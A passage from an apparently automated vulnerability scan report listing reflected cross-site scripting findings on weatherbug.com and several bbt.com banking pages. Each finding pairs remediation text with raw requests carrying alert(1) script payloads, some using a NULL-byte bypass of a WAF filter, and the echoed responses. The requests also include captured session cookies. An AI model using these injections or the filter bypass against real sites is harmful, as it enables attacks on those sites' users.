Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /?zip=75201&zcode=6292b8c92\'%3balert(1)//fb3d6162354 HTTP/1.1
Host: weather.weatherbug.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 101771
Content-Type: text/html; charset=utf-8
Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
p3p: CP="NON DSP COR NID"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: max-age=2700
Date: Thu, 03 Feb 2011 16:35:04 GMT
Connection: close


                                                                                   
...[SNIP]...
dmn = document.domain;
        wxOAS_sitepage = 'www.wthrwbug.com/HM';
    wxOAS_url = 'http://pub.weatherbug.com/RealMedia/ads/';
    wxOAS_targetparams = '&DMN=' + dmn + '&LNG=enUS&PC=6292b8c92\\';alert(1)//fb3d6162354&Z3=75201&L2=Dallas&L3=TX&L5=USA&L1=623&L4=53&WO1=20.3&FC1=1&FC2=126&FC3=7&FC7=33&FC9=49&WO3=101&HO1=2.70&HO4=Cedar/Juniper and Elm.&HO3=-999';
    wxOAS_listpos = 'cds1,cds2,cds3,cds4,cds9';
   
...[SNIP]...

4.440. http://weather.weatherbug.com/ [zcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /

Issue detail

The value of the zcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 478ba"style%3d"x%3aexpression(alert(1))"78c9aed888 was submitted in the zcode parameter. This input was echoed as 478ba"style="x:expression(alert(1))"78c9aed888 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?zip=75201&zcode=478ba"style%3d"x%3aexpression(alert(1))"78c9aed888 HTTP/1.1
Host: weather.weatherbug.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 103556
Content-Type: text/html; charset=utf-8
Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
p3p: CP="NON DSP COR NID"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: max-age=2700
Date: Thu, 03 Feb 2011 16:34:49 GMT
Connection: close


                                                                                   
...[SNIP]...
<iframe name="cds1" src="http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wthrwbug.com/HM@cds1?&LNG=enUS&PC=478ba"style="x:expression(alert(1))"78c9aed888&Z3=75201&L2=Dallas&L3=TX&L5=USA&L1=623&L4=53&WO1=20.3&FC1=1&FC2=126&FC3=7&FC7=33&FC9=49&WO3=101&HO1=2.70&HO4=Cedar/Juniper and Elm.&HO3=-999" width="728" height="90" allowtransparency="true" framebord
...[SNIP]...

4.441. http://www.bbt.com/bbt/Business/Products/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/Business/Products/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f5e39"><script>alert(1)</script>409e4716c9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f5e39"><script>alert(1)</script>409e4716c9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/Business/Products/?%00f5e39"><script>alert(1)</script>409e4716c9d=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:13 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 53268
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
           
...[SNIP]...
<a href="/bbt/Business/Products/default.html?page=print&%00f5e39"><script>alert(1)</script>409e4716c9d=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

4.442. http://www.bbt.com/bbt/Personal/Products/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/Personal/Products/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0069b54"><script>alert(1)</script>e1573406ba9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69b54"><script>alert(1)</script>e1573406ba9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/Personal/Products/?%0069b54"><script>alert(1)</script>e1573406ba9=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:11:49 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 40557
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
           
...[SNIP]...
<a href="/bbt/Personal/Products/default.html?page=print&%0069b54"><script>alert(1)</script>e1573406ba9=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

4.443. http://www.bbt.com/bbt/about/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/about/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002a618"><script>alert(1)</script>b69e85cef55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a618"><script>alert(1)</script>b69e85cef55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/about/?%002a618"><script>alert(1)</script>b69e85cef55=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:11:46 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 27477
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<
...[SNIP]...
<a href="/bbt/about/default.html?page=print&%002a618"><script>alert(1)</script>b69e85cef55=1" onClick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

4.444. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/about/privacyandsecurity/completeclientprotection/default.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007a93d"><script>alert(1)</script>a2f88c48136 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a93d"><script>alert(1)</script>a2f88c48136 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/about/privacyandsecurity/completeclientprotection/default.html?%007a93d"><script>alert(1)</script>a2f88c48136=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:35 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 30854
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   

       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
           
...[SNIP]...
<a href="/bbt/about/privacyandsecurity/completeclientprotection/default.html?page=print&%007a93d"><script>alert(1)</script>a2f88c48136=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

4.445. http://www.bbt.com/bbt/careers/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/careers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0012a7a"><script>alert(1)</script>5fb5315ccee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12a7a"><script>alert(1)</script>5fb5315ccee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/careers/?%0012a7a"><script>alert(1)</script>5fb5315ccee=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:11:51 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 33957
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

       
   <title>Car
...[SNIP]...
<a href="/bbt/careers/default.html?page=print&%0012a7a"><script>alert(1)</script>5fb5315ccee=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

4.446. http://www.bbt.com/bbt/mobile/mobile-product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/mobile/mobile-product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f9529"><script>alert(1)</script>45d303da152 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9529"><script>alert(1)</script>45d303da152 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/mobile/mobile-product.html?%00f9529"><script>alert(1)</script>45d303da152=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:30 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 30271
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
                   
...[SNIP]...
<a href="/bbt/mobile/mobile-product.html?page=print&%00f9529"><script>alert(1)</script>45d303da152=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

4.447. http://www.bbt.com/bbt/personal/products/checkcard/default.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/personal/products/checkcard/default.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0055e59"><script>alert(1)</script>759ab4bcd91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 55e59"><script>alert(1)</script>759ab4bcd91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/personal/products/checkcard/default.html?%0055e59"><script>alert(1)</script>759ab4bcd91=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:33 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 31030
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
...[SNIP]...
<a href="/bbt/personal/products/checkcard/default.html?page=print&%0055e59"><script>alert(1)</script>759ab4bcd91=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

4.448. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/personal/products/onlinebanking/default.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006f039"><script>alert(1)</script>d7e45a2b9d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f039"><script>alert(1)</script>d7e45a2b9d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/personal/products/onlinebanking/default.html?%006f039"><script>alert(1)</script>d7e45a2b9d5=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:39 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 35938
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
               
...[SNIP]...
<a href="/bbt/personal/products/onlinebanking/default.html?page=print&%006f039"><script>alert(1)</script>d7e45a2b9d5=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

4.449. http://www.bbt.com/bbt/sitemap.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/sitemap.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009f75f"><script>alert(1)</script>ddf7c1767f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f75f"><script>alert(1)</script>ddf7c1767f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/sitemap.html?%009f75f"><script>alert(1)</script>ddf7c1767f3=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:11:59 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 32253
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
...[SNIP]...
<a href="/bbt/sitemap.html?page=print&%009f75f"><script>alert(1)</script>ddf7c1767f3=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

4.450. https://www.bbt.com/images/chat/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bbt.com
Path:   /images/chat/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a1daf"><script>alert(1)</script>1641a099e6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a1daf"><script>alert(1)</script>1641a099e6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /images/chat/?%00a1daf"><script>alert(1)</script>1641a099e6e=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:33 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 207
cache-control: private
x-powered-by: ASP.NET
Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)


               <html><head><meta http-equiv="refresh" content="0;url=http://www.bbt.com/errors/403-14.asp?403;http://172.30.10.46:80/images/chat/?%00a1daf"><script>alert(1)</script>1641a099e6e=1"></head></html
...[SNIP]...

4.451. https://www.bbt.com/images/chat/oao-matrix/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bbt.com
Path:   /images/chat/oao-matrix/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00de7c6"><script>alert(1)</script>3830aed06ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de7c6"><script>alert(1)</script>3830aed06ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /images/chat/oao-matrix/?%00de7c6"><script>alert(1)</script>3830aed06ac=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

